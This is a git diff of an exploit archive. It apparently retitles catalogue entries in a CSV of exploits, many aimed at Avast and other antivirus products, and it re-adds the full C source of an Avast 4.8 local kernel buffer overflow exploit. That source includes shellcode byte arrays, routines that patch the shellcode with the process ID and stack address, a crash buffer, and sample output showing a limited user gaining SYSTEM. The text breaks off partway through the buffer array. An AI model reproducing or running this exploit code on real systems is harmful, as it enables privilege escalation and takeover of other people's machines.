diff --git a/files.csv b/files.csv index 841ba5452..1c9a2f0eb 100755 --- a/files.csv +++ b/files.csv @@ -8957,7 +8957,7 @@ id,file,description,date,author,platform,type,port 9489,platforms/multiple/local/9489.txt,"Multiple BSD Operating Systems setusercontext() Vulnerabilities",2009-08-24,kingcope,multiple,local,0 9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure Vulns",2009-08-24,"Khashayar Fereidani",php,webapps,0 9491,platforms/php/webapps/9491.txt,"Dow Group (new.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0 -9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional Local Kernel Buffer Overflow Exploit",2009-08-24,Heurs,windows,local,0 +9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional - Local Kernel Buffer Overflow Exploit",2009-08-24,Heurs,windows,local,0 9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure Vuln",2009-08-24,Septemb0x,php,webapps,0 9494,platforms/php/webapps/9494.txt,"humanCMS (Auth Bypass) SQL Injection Vulnerability",2009-08-24,next,php,webapps,0 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - (.wav) Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 @@ -9477,7 +9477,7 @@ id,file,description,date,author,platform,type,port 10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla Seamonkey 2.0 (jar50.dll) Null Pointer Derefernce",2009-11-16,"Marcin Ressel",windows,dos,0 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server 'APPE' and 'DELE' Command DoS",2009-11-13,zhangmc,windows,dos,21 10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 -10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 +10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 Antivirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 10107,platforms/windows/local/10107.pl,"Icarus 2.0 - (.pgn) Universal Local Buffer Overflow Exploit (SEH)",2009-11-17,"D3V!L FUCK3R",windows,local,0 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass and File Upload Vulnerability",2009-11-17,blackenedsecurity,asp,webapps,0 @@ -12749,7 +12749,7 @@ id,file,description,date,author,platform,type,port 14530,platforms/php/webapps/14530.txt,"Joomla CamelcityDB 2.2 - SQL Injection Vulnerability",2010-08-02,Amine_92,php,webapps,0 14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting (XSS)",2010-08-02,"Juan Manuel Garcia",php,webapps,0 14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0 -14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 aswFW.sys kernel driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0 +14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 - aswFW.sys kernel driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0 14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Include Vulnerability",2010-08-03,eidelweiss,php,webapps,0 14538,platforms/ios/local/14538.txt,"Apple iOS pdf Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0 14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0 @@ -12910,7 +12910,7 @@ id,file,description,date,author,platform,type,port 14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 <= 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll)",2010-08-25,storm,windows,local,0 14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0 -14743,platforms/windows/local/14743.c,"avast! <= 5.0.594 license files DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 +14743,platforms/windows/local/14743.c,"Avast! <= 5.0.594 - license files DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking Vulnerabilities",2010-08-25,Dr_IDE,windows,local,0 14750,platforms/windows/local/14750.txt,"VLC Media Player DLL Hijacking Exploit (wintab32.dll)",2010-08-25,Secfence,windows,local,0 14751,platforms/windows/local/14751.txt,"Microsoft Vista - BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll)",2010-08-25,"Beenu Arora",windows,local,0 @@ -32307,7 +32307,7 @@ id,file,description,date,author,platform,type,port 35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 'id' Parameter SQL Injection Vulnerability",2011-06-13,kaMtiEz,php,webapps,0 35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80 35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220_ 1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0 -35993,platforms/windows/local/35993.c,"AVG Internet Security 2015 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 +35993,platforms/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 35994,platforms/windows/local/35994.c,"BullGuard Multiple Products - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 @@ -34679,7 +34679,7 @@ id,file,description,date,author,platform,type,port 38381,platforms/windows/local/38381.py,"WinRar < 5.30 beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0 38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - .asx Stack Overflow",2015-10-02,ex_ptr,windows,local,0 38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200 -38384,platforms/windows/remote/38384.txt,"Avast Antivirus X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0 +38384,platforms/windows/remote/38384.txt,"Avast Antivirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0 38385,platforms/php/webapps/38385.txt,"KindEditor Multiple Remote File Upload Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0 38386,platforms/php/webapps/38386.txt,"PHPBoost Arbitrary File Upload and Information Disclosure Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0 38387,platforms/multiple/remote/38387.txt,"RubyGems fastreader 'entry_controller.rb' Remote Command Execution Vulnerability",2013-03-12,"Larry W. Cashdollar",multiple,remote,0 @@ -35196,10 +35196,10 @@ id,file,description,date,author,platform,type,port 38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - CSRF Vulnerability",2015-12-10,KnocKout,php,webapps,80 38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <=7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443 38930,platforms/multiple/dos/38930.txt,"Rar CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0 -38931,platforms/multiple/dos/38931.txt,"Avast OOB Write Decrypting PEncrypt Packed Executables",2015-12-10,"Google Security Research",multiple,dos,0 -38932,platforms/multiple/dos/38932.txt,"Avast JetDb::IsExploited4x - Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0 -38933,platforms/multiple/dos/38933.txt,"Avast Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0 -38934,platforms/windows/dos/38934.txt,"Avast Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0 +38931,platforms/multiple/dos/38931.txt,"Avast - OOB Write Decrypting PEncrypt Packed Executables",2015-12-10,"Google Security Research",multiple,dos,0 +38932,platforms/multiple/dos/38932.txt,"Avast - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0 +38933,platforms/multiple/dos/38933.txt,"Avast - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0 +38934,platforms/windows/dos/38934.txt,"Avast - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0 38935,platforms/asp/webapps/38935.txt,"CMS Afroditi 'id' Parameter SQL Injection Vulnerablity",2013-12-30,"projectzero labs",asp,webapps,0 38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for WordPress 'download-file.php' Script Directory Traversal Vulnerability",2013-12-30,"Henri Salo",php,webapps,0 38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability",2014-01-01,anonymous,linux,local,0 diff --git a/platforms/windows/local/35993.c b/platforms/windows/local/35993.c index 23de5e09f..b42de5aad 100755 --- a/platforms/windows/local/35993.c +++ b/platforms/windows/local/35993.c @@ -1,3 +1,4 @@ + /* Exploit Title - AVG Internet Security 2015 Arbitrary Write Privilege Escalation diff --git a/platforms/windows/local/9492.c b/platforms/windows/local/9492.c index 96684b306..3ab928992 100755 --- a/platforms/windows/local/9492.c +++ b/platforms/windows/local/9492.c @@ -1,591 +1,591 @@ -#include -#include -#include -#include -#include -#include - -/* -Program : avast! 4.8.1335 Professionnel -Homepage : http://www.avast.com -Discovery : 2009/07/29 -Author Contacted : 2009/07/31 -Found by : Heurs -This Advisory : Heurs -Contact : heurs@ghostsinthstack.org - - -//----- Application description - - -avast! antivirus software represents complete virus protection, -offering full desktop security including a resident shield. -This antivirus is certified by both ICSA Labs and West Coast -Labs Checkmark. - -//----- Description of vulnerability - -The File System Filter driver is prone to a local kernel buffer overflow. -This vulnerability allows an intruder to gain SYSTEM privileges on a Windows -system from a limited user account. - -//----- Proof Of Concept - -http://www.sysdream.com/LocalEscalation_Avast.rar - -//----- Credits - -http://www.sysdream.com -http://ghostsinthestack.org - -s.leberre at sysdream dot com -heurs at ghostsinthestack dot org - -//----- Greetings - -Virtualabs - - -//-----Exploitation - -############################################### -Avast Kernel Buffer Overflow Vulnerability -Proof Of Concept... - -===> Found : LocalEscalation_Avast.exe : 2676 - -Shellcode PID Uploaded ! -Shellcode Redirect Uploaded ! -Shellcode Stack Uploaded ! -Connecting... Found ! -Handle : 0000001C -Microsoft Windows XP [version 5.1.2600] -(C) Copyright 1985-2001 Microsoft Corp. - -C:\Documents and Settings\eleve\Bureau>whoami -SYSTEM -############################################### -*/ - -char UpdateAswMon [] = { - 0x5E, 0x81, 0xEE, 0x6B, 0x03, 0x00, 0x00, 0x81, 0xC6, 0x30, 0x9E, 0x00, 0x00, 0xC7, 0x06, 0x00, - 0x00, 0x00, 0x00 - }; - -char ShellcodeMaster[] = "\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00" -"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b" -"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08" -"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03" -"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22" -"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35"; - -char RealShellcode[] = "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15" -"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd" -"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1" -"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5" -"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde" -"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c" -"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33" -"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0" -"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a" -"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd" -"\x15\xf3\x1d\xb8"; - -int GetPidByName(char * name_Proc) { - PROCESSENTRY32 PEntry; - HANDLE hTool32; - - PEntry.dwSize = sizeof(PROCESSENTRY32); - hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); - if (hTool32 == INVALID_HANDLE_VALUE) { - printf("\nError ==> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)"); - getch(); - exit(0); - } - if(!Process32First(hTool32, &PEntry)) { - printf("\nError ==> Process32First(hTool32, &PEntry)"); - getch(); - exit(0); - } - if (!strcasecmp(PEntry.szExeFile, name_Proc)) { - printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID); - return PEntry.th32ProcessID; - } - //printf( "\n Process : PID\n"); - while(Process32Next(hTool32, &PEntry) != 0){ - if (strcasecmp(PEntry.szExeFile, name_Proc) == 0) { - CloseHandle(hTool32); - printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID); - return PEntry.th32ProcessID; - } - //printf("===> Trouver : %s : %d\n", PEntry.szExeFile, PEntry.th32ProcessID); - } - printf("\n%s n'a pas ete trouve.", name_Proc); - getch(); - exit(0); -} - -void MajShellcode(char * ProcessName){ - DWORD ProcessID; - DWORD MagicWord = 0x41414141; - int i; - - ProcessID = GetPidByName(ProcessName); - for (i=0; i> 8; - ShellcodeMaster[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16; - ShellcodeMaster[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24; - printf("Shellcode PID Uploaded !\n"); - return; - } - } - printf("Shellcode PID NOT Uploaded :\'(\n"); - return; -} - -void MajRealShellcode(){ - int i; - DWORD MagicWord = 0x11111111; - - for (i=0; i> 8; - ShellcodeMaster[i+2] = ((DWORD) &RealShellcode & 0x00FF0000) >> 16; - ShellcodeMaster[i+3] = ((DWORD) &RealShellcode & 0xFF000000) >> 24; - printf("Shellcode Redirect Uploaded !\n"); - return; - } - } - printf("Shellcode Redirect NOT Uploaded :\'(\n"); - return; -} - -int FindStack(){ - __asm__( - "mov %eax, %esp\n\t" - "leave\n\t" - "ret\n\t" - ); -} - -void MajRealStack(){ - int i; - DWORD MagicWord = 0x22222222; - DWORD StackLocation = FindStack(); - - for (i=0; i> 8; - ShellcodeMaster[i+2] = ((DWORD) &StackLocation & 0x00FF0000) >> 16; - ShellcodeMaster[i+3] = ((DWORD) &StackLocation & 0xFF000000) >> 24; - printf("Shellcode Stack Uploaded !\n"); - return; - } - } - printf("Shellcode NOT Uploaded :\'(\n"); - return; -} - -void AfficherListeFichiers(void) { - HANDLE hFind; - WIN32_FIND_DATAW FindData; - char Dossier[1024]; - - // Change de dossier - SetCurrentDirectory(Dossier); - - // DÈbut de la recherche - hFind=FindFirstFileW(L"*.*", &FindData); - if (hFind!=INVALID_HANDLE_VALUE) - { - // Si le fichier trouvÈ n'est pas un dossier mais bien un fichier, on affiche son nom - printf("%ws\n",FindData.cFileName); - // Fichiers suivants - while (FindNextFileW(hFind, &FindData)) - { - printf("%ws\n",FindData.cFileName); - } - } - // Fin de la recherche - FindClose(hFind); -} - -int __cdecl main(int argc, char* argv[]) -{ - HANDLE hDevice = (HANDLE) 0xffffffff; - DWORD NombreByte; - DWORD InitVal=0; - char welcome[1024], out[50]; - DWORD Crashing []={ - 0x73d1dde9, 0x24135758, 0xcd62b301, 0x35a96b72, - 0x45c3745d, 0xcfae802b, 0xed77fbb8, 0xecc2f16d, - 0xa6409255, 0x5b608056, 0x7b2e40db, 0xc250e10c, - 0x284fc4b1, 0xbab9b00d, 0x2fce932c, 0x42d9380b, - 0x72b21bd3, 0x4646eb4c, 0xdfcc6996, 0x4060e991, - 0xce1fa555, 0xeda7ae0b, 0x4f918340, 0x90059feb, - 0xf4cf7bb7, 0x8b0c9a64, 0x9b99f867, 0xd673970a, - 0x591dbc4c, 0x2d54989b, 0xddb9c19d, 0x8121eaac, - 0x199b21f5, 0xc30a1e03, 0x7c618cb1, 0xeb3e06f0, - 0x7cebbd74, 0xaef8a969, 0x25cdcda9, 0xf47297c9, - 0x58855260, 0x9b494eaa, 0x0c11e290, 0x4f1a6361, - 0x75063159, 0xc791bf70, 0x3a1751db, 0xf439049a, - 0x83abe375, 0xba84ad33, 0x3ca8acac, 0x17d3fd7e, - 0x319c0280, 0xcd69a6c1, 0x3fdcdfe6, 0xc3903332, - 0x1377c51c, 0x1cd14365, 0xa98d77f0, 0xd5746f3f, - 0xb3cb7cb2, 0xddd2ecf4, 0x6cb9baa0, 0x4b0e045a, - 0x98b7c236, 0x1203e0e5, 0x32449810, 0xaeb428f7, - 0xa2e7e6e3, 0x3b0443af, 0x1145d62b, 0xaff5c263, - 0xc496b3d7, 0x0b1c45d9, 0x8a463e85, 0x041251c8, - 0x1341294d, 0xacc885c9, 0x03c3b5e7, 0x4cd36063, - 0xbeec4324, 0x313554a7, 0x3b202113, 0xe836e635, - 0x5d65c8bd, 0x8d52bae6, 0x24b3ba7f, 0x9b781fa7, - 0x7efa8335, 0x73e87501, 0x316fcbe4, 0xfcc446bc, - 0x3697162d, 0x5f706b56, 0x3d74846f, 0x57b41e55, - 0x44b39b19, 0x40e6bf38, 0xa1d3527c, 0x20f6b70c, - 0xa772ce22, 0x876cdf3b, 0xa948a3ad, 0x054c9fd6, - 0x6ea65a25, 0x432a376f, 0x4217baa1, 0xd38f0661, - 0x2c40d3d8, 0x33a62f9a, 0x5a8ef7d8, 0x4d07effa, - 0x8ba68789, 0x1441d661, 0xf2f6d48f, 0x77e5d2ae, - 0xcc69ac3e, 0x26cc9de9, 0xd7518e7e, 0xc568abea, - 0x21089cf3, 0xdc3c48a5, 0x6110d1b2, 0x39f65dc9, - 0xd0b8055d, 0xd8cab72c, 0x26be700a, 0x5f028b6c, - 0x1af4a25d, 0xbae98a7c, 0x1d5e94ed, 0xb743fb4a, - 0x274eaede, 0xe84bc6c6, 0xbcc3dd24, 0x47c6b5d5, - 0x3f5a530f, 0x4bbd205e, 0xe5ed455d, 0xc23908e3, - 0xa7255550, 0xfeee9e59, 0x8d91a28c, 0x27f1cd56, - 0xbb7d2468, 0x2e53ae6f, 0x3d8ea58a, 0x9832f31e, - 0x87aca912, 0xf5607f93, 0x67e4d74e, 0xcffd3adf, - 0x38bda32a, 0x1ace8bf1, 0x16ad790d, 0xe7b78a4a, - 0x6e4a4f52, 0xa963805f, 0xb44512ab, 0xaaff642a, - 0x68723e9a, 0x9cb006f2, 0x73439f5a, 0xcca9abc0, - 0x755ec72c, 0xb90d959c, 0x96f5fed2, 0x54821cac, - 0x6d3b9e97, 0x254fa473, 0xe5806bdf, 0x1d3fe779, - 0x5d824e9c, 0x0cba2490, 0x86dafdd4, 0xb84d19dd, - 0x1cf0ecc5, 0x73a4c777, 0x6545b564, 0x12fc70dd, - 0x58357dcd, 0x70524921, 0xa4bf0661, 0xd3630be2, - 0xb4f95085, 0x2f8e9f3f, 0x8fb2c303, 0x5d534373, - 0x330ed7be, 0x090a7fee, 0x70a0936f, 0x91bc5628, - 0x2ad2a9fb, 0x437d15d2, 0xcb860a99, 0x8bbf5d22, - 0x5188ce41, 0xf419337b, 0xfe338d2c, 0xf397167d, - 0xb79f4c9a, 0x982b7bd0, 0xeda0e308, 0x19079984, - 0x44506743, 0x08eb3bff, 0x0b2c7b5e, 0xfc12c449, - 0x122c18c3, 0xcb18effc, 0x65070b56, 0x5bbc5f36, - 0xba194a66, 0x1ac6b812, 0x4936b720, 0x3064f4d9, - 0xea85383a, 0x5669ab43, 0xbfb9b2be, 0x2c961814, - 0x2a16193f, 0x5310fc35, 0x2dcf5351, 0x8fb793bf, - 0x0b4f51df, 0x7f9c69f8, 0x76bbd7bc, 0xc2cd8ee9, - 0xdaded21e, 0xeeb83782, 0xa45e26a1, 0xa94133c2, - 0xaec536ad, 0xa6026a8c, 0xbcb5a191, 0xd7babca3, - 0xb2d31f46, 0x19511dc1, 0x21437e92, 0x0bfaa87e, - 0x32685945, 0x55016b49, 0x994f9293, 0x599f9653, - 0xc492d42b, 0xfa4d8907, 0x6c1e0416, 0x073e9847, - 0x9ceee897, 0x479dec42, 0x60f26898, 0xa0b37906, - 0x7f433088, 0xe617b52a, 0x30df4460, 0x9945c0da, - 0x5f4f9196, 0x5b3095ad, 0x41e4f285, 0x225b324a, - 0xe5f83ba7, 0xbadf8b56, 0xc732f28d, 0xaa94e0d7, - 0x0f9da105, 0x80936817, 0xa3b40d2e, 0xa7d5791c, - 0x10b0a9bb, 0x83b95622, 0x32872694, 0x7b1b3d10, - 0xe0e1adf8, 0x32512498, 0x6bc6ff89, 0x0d11fef7, - 0x3875c984, 0x5a31db0e, 0xdd1df94b, 0x61148636, - 0x7372b587, 0x8856950e, 0x4f0af062, 0xb49ea480, - 0x799ce35e, 0x23ecabd9, 0x137ee004, 0xdd17f948, - 0xf2026141, 0x8afd0e45, 0x1188ac9a, 0x0f87f038, - 0xee43edef, 0x982bf738, 0x78b3ca5f, 0x4d8345d3, - 0x613e2505, 0x16ab7e08, 0xa7e68888, 0xa59d234c, - 0x61655904, 0xbec0d39c, 0x3d0d18b0, 0x8eb7a653, - 0x6bd2ad6f, 0x3fa66b0f, 0x5951c36f, 0x8e5c4bed, - 0x087d3d72, 0x65fdb9b3, 0x7aa0c8a5, 0x26c78496, - 0x3a8946f1, 0xb65f63b2, 0xeacb180d, 0xbda32816, - 0x424f7b1e, 0x667fb713, 0xfe8d6f2c, 0x7f3711ca, - 0x477ecf54, 0xbf36b283, 0x92a7518e, 0xfa378a84, - 0x9ddc8f83, 0xc844b947, 0x3ef9ab12, 0xe892b5b4, - 0x101854b2, 0x8f45e397, 0xa1b134ed, 0x5c2a4d5c, - 0xa887258a, 0xbea01c90, 0xfb77c826, 0x08e87f98, - 0x6c7b0709, 0x1f27fe7d, 0xe9d4d75f, 0xd3ecbaee, - 0x961a35c6, 0x8317caf4, 0xc93141a0, 0x71c2fa12, - 0x79afe953, 0x7024a929, 0x5187beec, 0x439aa4c4, - 0x1b5bf729, 0x20de52a2, 0x5afd531b, 0xcbc6d1dc, - 0x8a6c775d, 0x93823634, 0x31e3c106, 0x5c4756ec, - 0xb322318f, 0x8a8fe323, 0x7d8a483f, 0x538d06a5, - 0xd23e0864, 0x07739d15, 0x46845d65, 0xa90ed2a1, - 0x907709ae, 0x25c51a18, 0x7b361c60, 0xf7f12530, - 0xb5c8b862, 0x1e5579b7, 0x453fde63, 0x5854951c, - 0xb479e4b4, 0x0187185f, 0xe310f406, 0xc5ae83f5, - 0x385149c8, 0xe0538b56, 0x6ffa1c0f, 0x15a8c111, - 0xb901feb0, 0x5cb53fcf, 0x7b9596dd, 0xbedc1ead, - 0x6ea7517e, 0xf1c88cdb, 0x2cf213af, 0x67ebce96, - 0x458465ce, 0x6503c018, 0xf7d61a9b, 0xbb31a712, - 0xe0dc951b, 0x354a28a8, 0x51ecebf3, 0xdbf8e424, - 0xd71a0cd2, 0x708d5b40, 0xdd1cf833, 0xb4be28a4, - 0x41c589c0, 0x5d81889f, 0x97de9f7a, 0x43b18278, - 0x4c312b46, 0x2ec1048d, 0x438d30d9, 0xab7923d6, - 0xd36d6ed0, 0xb6165ede, 0x95369795, 0xd5b1b776, - 0x60fe0b11, 0x087563ae, 0xa709eacf, 0xededbbea, - 0xf134d8ea, 0x1e241ce6, 0x341248d6, 0x6c16117a, - 0x7517ff23, 0x4dfb2eda, 0x7cc84423, 0x96cf942d, - 0x32901498, 0xe3bc3a5d, 0x0b85bdb2, 0x7baf09ca, - 0x6c7b4c01, 0xb3a72934, 0x4d33e464, 0x7dc1cf69, - 0x166756c6, 0x08f5f62f, 0x3db6b309, 0xce886208, - 0x1daf5a03, 0xc724741a, 0xf052f4ed, 0x4297acad, - 0xdc6a5dfe, 0xd0c4a895, 0x97db4437, 0x6e227c97, - 0x05f4dab0, 0x13b4adf4, 0x0d8b71e6, 0x9ff6843d, - 0x0fdb8939, 0x58850dfd, 0x2b21f28e, 0x2603e115, - 0xb09ba646, 0xd6fe719b, 0xe87a9223, 0x18f3b642, - 0x4fb62852, 0xeda5dd40, 0x6e5dbbf4, 0x703a2f1f, - 0x4884a549, 0xb6b85046, 0xdbbb7868, 0xa38e09a3, - 0x66c6fa13, 0xea16a377, 0x1ced6fd3, 0x44a3e920, - 0xfe995619, 0x822d3af3, 0xe8399736, 0xa6ff023c, - 0x19b88da8, 0x9b26e290, 0xc6970f3e, 0x4607d070, - 0x7db5bfd9, 0xbdcc2cd7, 0x946faaf6, 0xfcd89b65, - 0x17712dee, 0x953a0c3f, 0xf1383334, 0xc32e8a92, - 0xeb678cf4, 0xb5265c91, 0x10ec1b31, 0x6d134dc1, - 0x8ae8143e, 0x26ff3968, 0xf579d43c, 0x8f9d85f3, - 0x02fad6bf, 0x3a7be637, 0xeff5542c, 0x71cd227a, - 0x4345de8e, 0x5c9202c7, 0x388f640c, 0x0de7d2cd, - 0xe9b74263, 0xe443d4ef, 0x9cabf0e1, 0x810b8762, - 0x23c14d38, 0x296bd907, 0xdfc31794, 0x026b9455, - 0x7632bccd, 0x8dcf7332, 0x23dcc4c2, 0x32885977, - 0x548fdcc5, 0x9fca128a, 0x294fbc82, 0xf7bcd7db, - 0x9cdcc0a9, 0xe26aec68, 0x04c39cf4, 0x0a8d0d2b, - 0xf72bdf30, 0xff04366a, 0x07e7b40a, 0x9b3b9d18, - 0x859b4b85, 0x53a44769, 0x0b1366e3, 0x39f4c10b, - 0xb1ccbe45, 0x9d31874e, 0xa8e0a3a6, 0x98d4a7d0, - 0xc24240f5, 0x421301e0, 0x09137099, 0x48d2a2dd, - 0x3f0fdb4a, 0xe1a9eb43, 0x84199aff, 0x4eff2f35, - 0xd52f92fd, 0xe99cb709, 0xcb8fc9ce, 0x4cd97110, - 0x035f2194, 0x87e8e12d, 0xecd7a018, 0xff80434f, - 0x5ad4430c, 0x51015613, 0x153a3cf8, 0x8bbb9e84, - 0x31bc1b01, 0x986e7b5e, 0x4708de0c, 0xe51a3ef6, - 0xd279b566, 0x4054b421, 0xd794d868, 0x5e174bd2, - 0xc9480f43, 0x61e1ac80, 0x65c89d78, 0xcc461265, - 0x6f8099a7, 0x76596a5c, 0xe134710e, 0x6ec09d49, - 0x095b4232, 0x251f6d2c, 0xb61f7712, 0x6031640c, - 0x081bb50e, 0xabfcf1aa, 0x303d79f3, 0x4e3caaa9, - 0xf87540ed, 0xf067072c, 0xe1e7f3a1, 0x82dd570b, - 0x2110f555, 0x988cc833, 0x985002b4, 0xedd3b5c3, - 0xf952a2cd, 0x06159e37, 0x1ac3e607, 0xda6888dc, - 0x534a76c9, 0x2a7a4148, 0xb5433071, 0x392f077a, - 0x4f91ca6e, 0x0c7736e0, 0x780dd6ed, 0x626f3aa9, - 0x26db5cac, 0xd12bc3e6, 0x70d14be1, 0x0bc60171, - 0x97203228, 0x66463a8d, 0x0ac460d4, 0xdf1906b3, - 0x0d19058b, 0xaa96fa9a, 0x8b220888, 0xfad29e31, - 0x90049f60, 0xb44780ab, 0xe52554ea, 0xe97a3e9e, - 0x2142a187, 0x6ba5f497, 0xf43334a9, 0xf9fb1c87, - 0x3d1f1949, 0x064149d5, 0x2e39a1e9, 0x35669c1b, - 0x0345c538, 0x623002d5, 0xa280da3a, 0xd32bc66c, - 0x047c437f, 0x2b60c09c, 0x154931e8, 0x2b316b42, - 0xa97028bb, 0x1b26881f, 0x0d93499d, 0xa681e3d0, - 0x64aed3a1, 0xb904296b, 0x6e8ef9c5, 0xc029dbe4, - 0x4c1968ca, 0xacceed0c, 0x0f137d05, 0x71b80cdb, - 0xd0e3a334, 0xab958932, 0x336c6a26, 0x42626069, - 0x2a2d154b, 0x14347b3a, 0xac80cd31, 0x9e9708d5, - 0x1641542a, 0x25d2dd4e, 0x5c434b1d, 0x070569b9, - 0xf0f63b05, 0x2e8328a8, 0xd263cf7b, 0xea1a2370, - 0xcbc81d0b, 0xf2a0075b, 0x141c700e, 0x10628529, - 0x6cec92e5, 0x4aa5f3d6, 0x6c3d960f, 0x942d9d60, - 0x896d6d23, 